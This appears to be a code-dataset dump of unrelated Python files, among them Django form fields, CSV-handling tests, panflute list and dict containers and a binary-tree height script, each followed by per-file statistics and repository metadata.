result = run_spec("matplotlib_errorbar.yml")
assert result.ret == 0
def test_matplotlib_regplot(tmpdir, run_spec):
result = run_spec("matplotlib_regplot.yml")
assert result.ret == 0
def test_matplotlib_subplots(tmpdir, run_spec):
result = run_spec("matplotlib_subplots.yml")
assert result.ret == 0
def test_no_output_on_cli(tmpdir, run_spec_no_output):
result = run_spec_no_output("errorbar_output.yml")
assert result.ret == 0
| 23.622222 | 81 | 0.676388 | 295 | 2,126 | 4.562712 | 0.152542 | 0.114413 | 0.086924 | 0.120357 | 0.753343 | 0.739227 | 0.720654 | 0.543091 | 0.204309 | 0.169391 | 0 | 0.0053 | 0.201317 | 2,126 | 89 | 82 | 23.88764 | 0.787397 | 0 | 0 | 0.40678 | 0 | 0 | 0.137818 | 0.044214 | 0 | 0 | 0 | 0 | 0.152542 | 1 | 0.254237 | false | 0 | 0.050847 | 0 | 0.40678 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
86a56bf132ec9905600491082d231a8ff09388f0 | 265 | py | Python | front/utils.py | etalab-ia/pdf_api | adfb1d54d66e794073285b91fcc86f70e33c02ae | [
"MIT"
] | null | null | null | front/utils.py | etalab-ia/pdf_api | adfb1d54d66e794073285b91fcc86f70e33c02ae | [
"MIT"
] | null | null | null | front/utils.py | etalab-ia/pdf_api | adfb1d54d66e794073285b91fcc86f70e33c02ae | [
"MIT"
] | null | null | null | import os
import streamlit as st
def save_uploaded_file(uploaded_file, path):
with open(os.path.join(path, uploaded_file.name), "wb") as f:
f.write(uploaded_file.getbuffer())
return st.success("Saved File:{} to {}".format(uploaded_file.name, path)) | 37.857143 | 77 | 0.716981 | 41 | 265 | 4.487805 | 0.560976 | 0.326087 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143396 | 265 | 7 | 77 | 37.857143 | 0.810573 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
86b83db1a4475c35a6d2678493f7612ed5e4b36c | 2,240 | py | Python | ldap_peoples/form_fields.py | fx74/django-ldap-academia-ou-manager | c5bffa963e389f970e1a8e257fe107ebbc201b54 | [
"BSD-2-Clause"
] | 16 | 2019-01-13T10:37:20.000Z | 2021-11-25T09:51:19.000Z | ldap_peoples/form_fields.py | fx74/django-ldap-academia-ou-manager | c5bffa963e389f970e1a8e257fe107ebbc201b54 | [
"BSD-2-Clause"
] | 1 | 2020-12-03T11:48:45.000Z | 2020-12-03T11:48:45.000Z | ldap_peoples/form_fields.py | fx74/django-ldap-academia-ou-manager | c5bffa963e389f970e1a8e257fe107ebbc201b54 | [
"BSD-2-Clause"
] | 4 | 2019-01-17T14:50:33.000Z | 2020-12-03T11:47:05.000Z | from django import forms
from django.core import validators
from django.utils.translation import ugettext_lazy as _
class ListField(forms.Field):
def has_changed(self, initial, data):
"""Return True if data differs from initial."""
# Always return False if the field is disabled since self.bound_data
# always uses the initial value in this case.
# print(sorted(initial), sorted(data))
if self.disabled:
return False
try:
data = self.to_python(data)
if hasattr(self, '_coerce'):
return self._coerce(data) != self._coerce(initial)
except ValidationError:
return True
# For purposes of seeing whether something has changed, None is
# the same as an empty string, if the data or initial value we get
# is None, replace it with ''.
initial_value = initial if initial is not None else ''
data_value = data if data is not None else ''
return sorted(initial_value) != sorted(data_value)
class EmailListField(ListField):
pass
#def validate_email_list(value):
#print('EXEC')
#if not isinstance(value, list):
#raise ValidationError(
#_('%(value)s is not a list'),
#params={'value': value},
#)
#for item in value:
#validation = validators.validate_email(item)
#print(validation, item)
# TODO
#def validate(self, value):
#"""Check if value consists only of valid emails."""
#print(value)
#super().validate(value)
#for email in value:
#validate_email(email)
#default_validators = [validate_email_list]
class ScopedListField(ListField):
pass
# TODO
# class TimeStampField(forms.SplitDateTimeField):
# widget = DateTimeInput
# input_formats = formats.get_format_lazy('DATETIME_INPUT_FORMATS')
# default_error_messages = {
# 'invalid': _('Enter a valid date/time.'),
# }
# def clean(self, value):
# value = self.to_python(value)
# self.validate(value)
# self.run_validators(value)
# print(self.__dict__, value)
# return value
| 32.463768 | 76 | 0.612946 | 259 | 2,240 | 5.169884 | 0.397683 | 0.035848 | 0.017924 | 0.019417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.291964 | 2,240 | 68 | 77 | 32.941176 | 0.844262 | 0.507589 | 0 | 0.1 | 0 | 0 | 0.006598 | 0 | 0 | 0 | 0 | 0.014706 | 0 | 1 | 0.05 | false | 0.1 | 0.15 | 0 | 0.55 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
86c85487bdd6c4b71d56f86b754f528eae27ea0d | 99 | py | Python | JuneLong19/xortest.py | mayank-kumar-giri/Competitive-Coding | 4cd26ede051bad15bf25cfd037317c313b607507 | [
"MIT"
] | null | null | null | JuneLong19/xortest.py | mayank-kumar-giri/Competitive-Coding | 4cd26ede051bad15bf25cfd037317c313b607507 | [
"MIT"
] | null | null | null | JuneLong19/xortest.py | mayank-kumar-giri/Competitive-Coding | 4cd26ede051bad15bf25cfd037317c313b607507 | [
"MIT"
] | null | null | null | n = 95
for i in range(1,1000):
a = n ^ i
print(bin(a),a)
print(i,bin(n),n)
print() | 14.142857 | 23 | 0.484848 | 21 | 99 | 2.285714 | 0.52381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102941 | 0.313131 | 99 | 7 | 24 | 14.142857 | 0.602941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
86de7ae33a8de99b470fdd69c5cb0a9fbc95628a | 714 | py | Python | transition.py | RaghubirChimni/LogGenerator | fc7a52ddad15b0885d9f14ffe2d3f017fac63b01 | [
"MIT"
] | 1 | 2019-06-11T20:32:04.000Z | 2019-06-11T20:32:04.000Z | transition.py | GabrielSiq/LogGenerator | c3103059bc9a8088d760d756836f6fd0a0b49cd0 | [
"MIT"
] | null | null | null | transition.py | GabrielSiq/LogGenerator | c3103059bc9a8088d760d756836f6fd0a0b49cd0 | [
"MIT"
] | 2 | 2020-11-16T18:54:15.000Z | 2021-01-22T22:18:59.000Z | from typing import Union, Tuple
from duration import Duration
class Transition:
# Initialization and instance variables
def __init__(self, source: str, destination: str, sgate: str = None, dgate: str = None, distribution: Union[dict, int] = 0) -> None:
self.source = source
self.source_gate = sgate
self.destination = destination
self.destination_gate = dgate
self.delay = Duration(distribution)
# Public methods
def get_next(self) -> Tuple[str, str, int]:
return self.destination, self.destination_gate, self.delay.generate()
# Private methods
def __repr__(self):
return ', '.join("%s: %s" % item for item in vars(self).items())
| 34 | 136 | 0.665266 | 87 | 714 | 5.321839 | 0.482759 | 0.12959 | 0.112311 | 0.12959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001818 | 0.229692 | 714 | 20 | 137 | 35.7 | 0.84 | 0.095238 | 0 | 0 | 0 | 0 | 0.012461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.153846 | 0.153846 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
86e56f2059cbc90d0370dd853a96bccd5507662e | 8,973 | py | Python | tests/test_csv_file.py | changrunner/zeppos_csv | 5b55619bb3baec4c1a676d904bec4fd573d220a9 | [
"Apache-2.0"
] | null | null | null | tests/test_csv_file.py | changrunner/zeppos_csv | 5b55619bb3baec4c1a676d904bec4fd573d220a9 | [
"Apache-2.0"
] | null | null | null | tests/test_csv_file.py | changrunner/zeppos_csv | 5b55619bb3baec4c1a676d904bec4fd573d220a9 | [
"Apache-2.0"
] | null | null | null | import unittest
from zeppos_csv.csv_file import CsvFile
from tests.util_for_testing import UtilForTesting
from zeppos_bcpy.sql_configuration import SqlConfiguration
import os
from zeppos_logging.app_logger import AppLogger
import pandas as pd
from pandas._testing import assert_frame_equal
class TestProjectMethods(unittest.TestCase):
def setUp(self):
UtilForTesting.file_clean_up()
def tearDown(self):
UtilForTesting.file_clean_up()
def test_constructor_method(self):
self.assertEqual(str(type(CsvFile(r"c:\temp\test1.csv"))), "<class 'zeppos_csv.csv_file.CsvFile'>")
def test_get_dataframe_windows_encoding_with_header(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c1',
content="col1,col2\ntest1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_windows_encoding_with_header()
self.assertEqual(1, df.shape[0])
def test_get_dataframe_windows_encoding_with_header_and_chunking_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c2', content="col1,col2\ntest1,test2")
df_chunks = CsvFile(full_file_name_list[0]).get_dataframe_windows_encoding_with_header_and_chunking()
self.assertEqual(1, df_chunks.get_chunk().shape[0])
def test_get_dataframe_windows_encoding_without_header(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c3', content="test1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_windows_encoding_without_header(['col1','col2'])
self.assertEqual(1, df.shape[0])
def test_get_dataframe_windows_encoding_without_header_and_chunking_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c4', content="test1,test2\ntest1,test2\n")
df_chunks = CsvFile(full_file_name_list[0]).get_dataframe_windows_encoding_without_header_and_chunking(['col1', 'col2'])
self.assertEqual(2, df_chunks.get_chunk().shape[0])
def test_get_dataframe_utf8_encoding_with_header_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c5', content="col1|col2\ntest1|test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_with_header()
self.assertEqual(df.shape[0], 1)
self.assertEqual(df.columns[0], 'col1')
self.assertEqual(df.columns[1], 'col2')
def test_get_dataframe_utf8_encoding_without_header_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c6', content="test1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_without_header(['col1', 'col2'])
self.assertEqual(df.shape[0], 1)
self.assertEqual(df.columns[0], 'col1')
self.assertEqual(df.columns[1], 'col2')
def test_get_dataframe_utf8_encoding_with_header_and_chunkung_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c7',
content="col1,col2\ntest1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_with_header_and_chunking()
self.assertEqual(df.get_chunk().shape[0], 1)
def test_get_dataframe_utf8_encoding_without_header_and_chunking_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c8', content="test1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_without_header_and_chunking(['col1', 'col2'])
self.assertEqual(df.get_chunk().shape[0], 1)
#################################################
# Test file_manager.file inherited functionality
#################################################
def test_file_name_property(self):
self.assertEqual(CsvFile("c:\\temp\\test.csv").file_name, "test.csv")
def test_full_file_name_property(self):
self.assertEqual(CsvFile("c:\\temp\\test.csv").full_file_name, "c:\\temp\\test.csv")
def test_full_extension_property(self):
self.assertEqual(CsvFile("c:\\temp\\test.csv").extension, "csv")
def test_mark_file_as_done_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('done')
CsvFile(full_file_name=full_file_name_list[0]).mark_as_done()
self.assertEqual(os.path.exists(full_file_name_list[0] + ".done"), True)
def test_mark_file_as_fail_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('fail')
CsvFile(full_file_name=full_file_name_list[0]).mark_as_fail()
self.assertEqual(os.path.exists(full_file_name_list[0] + ".fail"), True)
def test_mark_file_as_nodata_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('nodata')
CsvFile(full_file_name=full_file_name_list[0]).mark_as_nodata()
self.assertEqual(os.path.exists(full_file_name_list[0] + ".nodata"), True)
def test_get_total_line_count_for_file_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup(sub_directory="file_info", content="1\n2\n")
self.assertEqual(
CsvFile(full_file_name_list[0]).get_total_line_count_for_file(),
2
)
def test_mark_file_as_ready_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('ready', '.done')
result = CsvFile(full_file_name_list[0]).mark_file_as_ready()
self.assertEqual(result, True)
self.assertEqual(os.path.exists(os.path.splitext(full_file_name_list[0])[0]), True)
def test_to_sql_server_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('ready1', '', content="seconds|minutes\n3600|12\n")
return_dict = CsvFile.to_sql_server(
pandas_dataframe=CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_with_header(),
sql_configuration=SqlConfiguration(
server_type="microsoft",
server_name="localhost\\sqlexpress",
database_name="master",
schema_name="dbo",
table_name="staging_test_to_sql_server"
)
)
self.assertEqual(["SECONDS", "MINUTES", 'AUDIT_CREATE_UTC_DATETIME'], return_dict["columns"])
self.assertEqual(None, return_dict["error"])
def test_to_sql_server_with_additional_static_info_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('ready1', '', content="seconds|minutes\n3600|12\n")
return_dict = CsvFile.to_sql_server(
pandas_dataframe=CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_with_header(),
sql_configuration=SqlConfiguration(
server_type="microsoft",
server_name="localhost\\sqlexpress",
database_name="master",
schema_name="dbo",
table_name="staging_test_to_sql_server2"
),
additional_static_data_dict={'static_field1': 'some info 1', 'static_field2': 'some info 2'}
)
self.assertEqual(['SECONDS', 'MINUTES', 'STATIC_FIELD1', 'STATIC_FIELD2', 'AUDIT_CREATE_UTC_DATETIME'], return_dict["columns"])
self.assertEqual(None, return_dict["error"])
def test_to_sql_server_with_chunking_method(self):
AppLogger.set_debug_level()
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('ready2', '',
content="seconds|minutes\n3600|12\n3600|13\n3600|14\n3600|15\n3600|16\n")
csv_file = CsvFile(full_file_name_list[0])
return_dict = CsvFile(full_file_name_list[0]).to_sql_server_with_chunking(
pandas_dataframe_chunks=csv_file.get_dataframe_windows_encoding_with_header_and_chunking(batch_size=2),
sql_configuration=SqlConfiguration(
server_type="microsoft",
server_name="localhost\\sqlexpress",
database_name="master",
schema_name="dbo",
table_name="staging_test_to_sql_server3",
)
)
self.assertEqual(["SECONDS", "MINUTES", 'AUDIT_CREATE_UTC_DATETIME', 'CSV_FILE_NAME'], return_dict["columns"])
self.assertEqual(None, return_dict["error"])
def test_save_dataframe_method(self):
csv_file = CsvFile(r"c:\temp\test.csv")
df_expected = pd.DataFrame({'seconds': [3600], 'minutes': [10]}, columns=['seconds', 'minutes'])
csv_file.save_dataframe(df_expected)
df_actual = pd.read_csv(r"c:\temp\test.csv", sep="|")
assert_frame_equal(df_actual, df_expected)
if __name__ == '__main__':
unittest.main()
| 50.694915 | 149 | 0.690516 | 1,170 | 8,973 | 4.863248 | 0.133333 | 0.063269 | 0.088576 | 0.104042 | 0.78348 | 0.745343 | 0.700879 | 0.688225 | 0.637961 | 0.617926 | 0 | 0.02225 | 0.188566 | 8,973 | 176 | 150 | 50.982955 | 0.759236 | 0.005126 | 0 | 0.279412 | 0 | 0.007353 | 0.125297 | 0.053925 | 0 | 0 | 0 | 0 | 0.220588 | 1 | 0.169118 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
86eab53612ebaf581b877e4e75d7e2dc2f2e2320 | 103 | py | Python | lib/tx.py | tildecross/tx | c59d5f18f95160d6eaaafaeff0e8f02b132bcc7b | [
"BSD-3-Clause"
] | null | null | null | lib/tx.py | tildecross/tx | c59d5f18f95160d6eaaafaeff0e8f02b132bcc7b | [
"BSD-3-Clause"
] | null | null | null | lib/tx.py | tildecross/tx | c59d5f18f95160d6eaaafaeff0e8f02b132bcc7b | [
"BSD-3-Clause"
] | null | null | null | from core import Core
class Tx:
def __init__(self):
self.core = Core()
tx = Tx()
| 12.875 | 26 | 0.543689 | 14 | 103 | 3.714286 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.349515 | 103 | 7 | 27 | 14.714286 | 0.776119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
86fd210a10933ec93d4a4b2c057f9647b3353006 | 459 | py | Python | beamer/config.py | beamer-bridge/beamer | 79e9c8abdff1e05febf0ac9af0f4308290010604 | [
"MIT"
] | 2 | 2022-03-29T16:51:52.000Z | 2022-03-30T13:23:23.000Z | beamer/config.py | beamer-bridge/beamer | 79e9c8abdff1e05febf0ac9af0f4308290010604 | [
"MIT"
] | 56 | 2022-03-25T09:12:42.000Z | 2022-03-31T14:01:54.000Z | beamer/config.py | beamer-bridge/beamer | 79e9c8abdff1e05febf0ac9af0f4308290010604 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from pathlib import Path
from typing import Optional
from eth_account.signers.local import LocalAccount
from beamer.contracts import DeploymentInfo
from beamer.typing import URL
@dataclass
class Config:
account: LocalAccount
deployment_info: DeploymentInfo
l1_rpc_url: URL
l2a_rpc_url: URL
l2b_rpc_url: URL
token_match_file: Path
fill_wait_time: int
prometheus_metrics_port: Optional[int]
| 21.857143 | 50 | 0.793028 | 62 | 459 | 5.645161 | 0.564516 | 0.051429 | 0.077143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007895 | 0.172113 | 459 | 20 | 51 | 22.95 | 0.913158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.375 | 0 | 0.9375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
8104b4bdce0eba8be4737fc520b6ace52e05d736 | 5,054 | py | Python | panflute/containers.py | robert-shade/panflute | 6df0a347b00f361df9b0067cdcf2c6492f479377 | [
"BSD-3-Clause"
] | null | null | null | panflute/containers.py | robert-shade/panflute | 6df0a347b00f361df9b0067cdcf2c6492f479377 | [
"BSD-3-Clause"
] | null | null | null | panflute/containers.py | robert-shade/panflute | 6df0a347b00f361df9b0067cdcf2c6492f479377 | [
"BSD-3-Clause"
] | null | null | null | """
These containers keep track of the identity of the parent
object, and the attribute of the parent object that they correspond to.
"""
# ---------------------------
# Imports
# ---------------------------
import sys
py2 = sys.version_info[0] == 2
if py2: str = basestring
if py2:
from collections import OrderedDict, MutableSequence, MutableMapping
else:
from collections import OrderedDict
from collections.abc import MutableSequence, MutableMapping
from .utils import check_type, encode_dict # check_group
# ---------------------------
# Container Classes
# ---------------------------
# These are list and OrderedDict containers that
# (a) track the identity of their parents, and
# (b) track the parent's property where they are stored
# They attach these two to the elements requested through __getattr__
class ListContainer(MutableSequence):
"""
Wrapper around a list, to track the elements' parents.
**This class shouldn't be instantiated directly by users,
but by the elements that contain it**.
:param args: elements contained in the list--like object
:param oktypes: type or tuple of types that are allowed as items
:type oktypes: ``type`` | ``tuple``
:param parent: the parent element
:type parent: ``Element``
:param container: None, unless the element is not part of its .parent.content (this is the case for table headers for instance, which are not retrieved with table.content but with table.header)
:type container: ``str`` | None
"""
# Based on http://stackoverflow.com/a/3488283
# See also https://docs.python.org/3/library/collections.abc.html
__slots__ = ['list', 'oktypes', 'parent', 'location']
def __init__(self, *args, oktypes=object, parent=None):
self.oktypes = oktypes
self.parent = parent
self.location = None # Cannot be set through __init__
self.list = []
self.extend(args) # self.oktypes must be set first
def __contains__(self, item):
return item in self.list
def __len__(self):
return len(self.list)
def __getitem__(self, i):
if isinstance(i, int):
return attach(self.list[i], self.parent, self.location)
else:
newlist = self.list.__getitem__(i)
obj = ListContainer(*newlist,
oktypes=self.oktypes, parent=self.parent)
obj.location = self.location
return obj
def __delitem__(self, i):
del self.list[i]
def __setitem__(self, i, v):
v = check_type(v, self.oktypes)
self.list[i] = v
def insert(self, i, v):
v = check_type(v, self.oktypes)
self.list.insert(i, v)
def __str__(self):
return self.__repr__()
def __repr__(self):
return 'ListContainer({})'.format(' '.join(repr(x) for x in self.list))
def to_json(self):
return [to_json_wrapper(item) for item in self.list]
class DictContainer(MutableMapping):
"""
Wrapper around a dict, to track the elements' parents.
**This class shouldn't be instantiated directly by users,
but by the elements that contain it**.
:param args: elements contained in the dict--like object
:param oktypes: type or tuple of types that are allowed as items
:type oktypes: ``type`` | ``tuple``
:param parent: the parent element
:type parent: ``Element``
"""
__slots__ = ['dict', 'oktypes', 'parent', 'location']
def __init__(self, *args, oktypes=object, parent=None, **kwargs):
self.oktypes = oktypes
self.parent = parent
self.location = None
self.dict = OrderedDict()
self.update(args) # Must be a sequence of tuples
self.update(kwargs) # Order of kwargs is not preserved
def __contains__(self, item):
return item in self.dict
def __len__(self):
return len(self.dict)
def __getitem__(self, k):
return attach(self.dict[k], self.parent, self.location)
def __delitem__(self, k):
del self.dict[k]
def __setitem__(self, k, v):
v = check_type(v, self.oktypes)
self.dict[k] = v
def __str__(self):
return self.__repr__()
def __repr__(self):
return 'DictContainer({})'.format(' '.join(repr(x) for x in self.dict))
def __iter__(self):
return self.dict.__iter__()
def to_json(self):
items = self.dict.items()
return OrderedDict((k, to_json_wrapper(v)) for k, v in items)
return [item.to_json() for item in self.dict]
# ---------------------------
# Functions
# ---------------------------
def attach(element, parent, location):
if not isinstance(element, (int, str, bool)):
element.parent = parent
element.location = location
else:
print(element, 'has no parent')
return element
def to_json_wrapper(e):
if isinstance(e, str):
return e
elif isinstance(e, bool):
return encode_dict('MetaBool', e)
else:
return e.to_json()
| 29.905325 | 197 | 0.622477 | 646 | 5,054 | 4.687307 | 0.252322 | 0.02642 | 0.023778 | 0.010898 | 0.356341 | 0.356341 | 0.341149 | 0.341149 | 0.292602 | 0.259577 | 0 | 0.003405 | 0.244559 | 5,054 | 168 | 198 | 30.083333 | 0.78968 | 0.348635 | 0 | 0.284091 | 0 | 0 | 0.033743 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.056818 | 0.125 | 0.568182 | 0.011364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
81052ab68524c0862cd11da15370bdda191089a4 | 140 | py | Python | django/CVE-2021-35042/web/vuln/apps.py | nobgr/vulhub | b24a89459fbd98ba76881adb6d4e2fb376792863 | [
"MIT"
] | 9,681 | 2017-09-16T12:31:59.000Z | 2022-03-31T23:49:31.000Z | django/CVE-2021-35042/web/vuln/apps.py | starkxun/vulhub | e5c1b204a6bf1e27d654569ec963329486f230e6 | [
"MIT"
] | 180 | 2017-11-01T08:05:07.000Z | 2022-03-31T05:26:33.000Z | django/CVE-2021-35042/web/vuln/apps.py | starkxun/vulhub | e5c1b204a6bf1e27d654569ec963329486f230e6 | [
"MIT"
] | 3,399 | 2017-09-16T12:21:54.000Z | 2022-03-31T12:28:48.000Z | from django.apps import AppConfig
class VulnConfig(AppConfig):
name = 'vuln'
default_auto_field = 'django.db.models.BigAutoField'
| 20 | 56 | 0.75 | 17 | 140 | 6.058824 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157143 | 140 | 6 | 57 | 23.333333 | 0.872881 | 0 | 0 | 0 | 0 | 0 | 0.235714 | 0.207143 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
811fb08146675ce608fef97368865a1b0650aaa2 | 80 | py | Python | the-python-standard-library-by-example/calendar/calendar_textcalendar.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 13 | 2020-01-04T07:37:38.000Z | 2021-08-31T05:19:58.000Z | the-python-standard-library-by-example/calendar/calendar_textcalendar.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 3 | 2020-06-05T22:42:53.000Z | 2020-08-24T07:18:54.000Z | the-python-standard-library-by-example/calendar/calendar_textcalendar.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 9 | 2020-10-19T04:53:06.000Z | 2021-08-31T05:20:01.000Z |
import calendar
c = calendar.TextCalendar(calendar.SUNDAY)
c.prmonth(2017, 7)
| 13.333333 | 42 | 0.775 | 11 | 80 | 5.636364 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070423 | 0.1125 | 80 | 5 | 43 | 16 | 0.802817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
81330c931de8a17bf78139d00524331d06347cce | 936 | py | Python | python/ds/heightBinaryTree.py | unhingedporter/DataStructureMustKnow | 3c5b3225afa2775d37a2ff90121f73208717640a | [
"MIT"
] | 3 | 2019-11-23T08:43:58.000Z | 2019-11-23T08:52:53.000Z | python/ds/heightBinaryTree.py | unhingedpotter/DSMustKnow | 64958cbbbb3f4cdb1104c2255e555233554503f9 | [
"MIT"
] | null | null | null | python/ds/heightBinaryTree.py | unhingedpotter/DSMustKnow | 64958cbbbb3f4cdb1104c2255e555233554503f9 | [
"MIT"
] | null | null | null | # Find height of a given binary tree
class Node():
def __init__(self, value):
self.left = None
self.right = None
self.value = value
class Tree():
def height(self, node: Node):
if node is None or (node.left is None and node.right is None):
return 0
else:
left_sub_tree_height = self.height(node.left)
right_sub_tree_height = self.height(node.right)
return max(left_sub_tree_height, right_sub_tree_height) + 1
n = Node(15)
n.left = Node(10)
n.right = Node(20)
n.left.right = Node(12)
n.right.left = Node(18)
n.right.right = Node(30)
# Creating left skewed tree
n1 = Node(5)
n1.left = Node(0)
n1.left.left = Node(0)
n1.left.left.left = Node(0)
n1.left.left.left.left = Node(0)
n1.left.left.left.left.left = Node(0)
n1.left.left.left.left.left.left = Node(0)
n.left.left = n1
print(f'The height of the tree is {Tree().height(n)}')
